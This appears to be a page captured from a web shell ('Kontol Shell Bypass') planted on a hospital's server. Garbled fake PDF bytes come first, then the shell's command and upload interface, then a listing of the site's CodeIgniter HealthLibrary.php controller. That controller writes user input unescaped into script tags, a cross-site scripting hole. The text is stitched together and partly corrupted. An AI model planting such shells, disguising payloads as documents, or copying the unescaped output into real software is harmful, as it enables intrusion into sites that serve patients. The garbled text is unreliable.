%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/application/controllers/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/application/controllers/HealthLibrary.php
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

class HealthLibrary extends CI_Controller {

	/**
	 * Index Page for this controller.
	 *
	 * Maps to the following URL
	 * 		http://example.com/index.php/welcome
	 *	- or -
	 * 		http://example.com/index.php/welcome/index
	 *	- or -
	 * Since this controller is set as the default controller in
	 * config/routes.php, it's displayed at http://example.com/
	 *
	 * So any other public methods not prefixed with an underscore will
	 * map to /index.php/welcome/<method_name>
	 * @see https://codeigniter.com/user_guide/general/urls.html
	 */
	function __construct() {
        parent::__construct();
        
        $this->load->model('health_library_model', 'condition');
        $this->load->model('doctor_model', 'doctor');
        $this->load->model('department_model', 'department');
    }
	
	
	public function index($id=0)
	{
		
		if(!$id){
			$this->view_health_conditions('A');
		}
		else{
			$this->view_health_condition($id);
		}
		
	}
	
	public function view_health_conditions($alpha=''){
	
	    $data=array();

	    echo '<script>console.log("'.$alpha.'")</script>';
	    if($alpha!=''){
	            
	        $data['conditions'] = $this->condition->get_health_conditions_by_alphabet($alpha);
	  
	        echo '<script>console.log("'.count($this->condition->get_health_conditions_by_alphabet($alpha)).'")</script>';
	        foreach($data['conditions'] as $condition){
		    echo '<script>console.log("'.$condition['HealthConditionTitle'].'")</script>';
		    }
	    }
		else{
		    $data['conditions'] = $this->condition->get_health_conditions();
		}
		
//		foreach($data['conditions'] as $condition){
//		    echo '<script>console.log("'.$condition['HealthConditionTitle'].'")</script>';
//		}
        $data['first_chars'] = $this->condition->get_first_chars();
		$data['active_char'] = $alpha;
		
		$seoArray = getdynamicseo($this->uri->segment(1));
		
	    $data['page_title'] = $seoArray->SEOTitle!='' ? $seoArray->SEOTitle : 'Health Library';
	    $data['page_description'] = $seoArray->SEODescription!='' ? $seoArray->SEODescription : 'Health Library';
	    $data['page_keyword'] = $seoArray->SEOKeywords!='' ? $seoArray->SEOKeywords : 'Health Library';
   
	//	$data['page_title'] = 'Health Library';
        
         //To be used in header forms
		$data['departments_list']=$this->department->get_department_list( 'DepartmentType ASC', 'A');
		
		$data['coes'] = $this->department->get_departments_summary('',array('COE'));
        
		$this->load->view('health_library',$data);
	}
	
	public function view_health_condition($id){
	    
	    $cond_id=$id;
	    if($id&&!is_numeric($id)){
	        $cond_id= $this->condition->get_health_condition_id($id)['HealthConditionID'];
	    }
	    
	    $data['condition'] = $this->condition->get_health_condition($cond_id);
	    
	    $departments = $data['condition']['HealthConditionDepartment'];
	    
	    $data['related_doctors'] = $this->doctor->get_doctors('',array(),'',$departments,'','','A');
	    
	    $data['department'] = $this->department->get_department($departments);
	    
	     //To be used in header forms
		$data['departments_list']=$this->department->get_department_list( 'DepartmentType ASC', 'A');
		
		$data['coes'] = $this->department->get_departments_summary('',array('COE'));
        
		$seoArray = getdynamicseo($this->uri->segment(2));
		
	    $data['page_title'] = $seoArray->SEOTitle!='' ? $seoArray->SEOTitle : $data['condition']['HealthConditionTitle'];
	    $data['page_description'] = $seoArray->SEODescription!='' ? $seoArray->SEODescription : $data['condition']['HealthConditionTitle'];
	    $data['page_keyword'] = $seoArray->SEOKeywords!='' ? $seoArray->SEOKeywords : $data['condition']['HealthConditionTitle'];
		

	 //   $data['page_title'] = $data['condition']['HealthConditionTitle'];
	    $this->load->view('health_condition',$data);
	}
	
}

Kontol Shell Bypass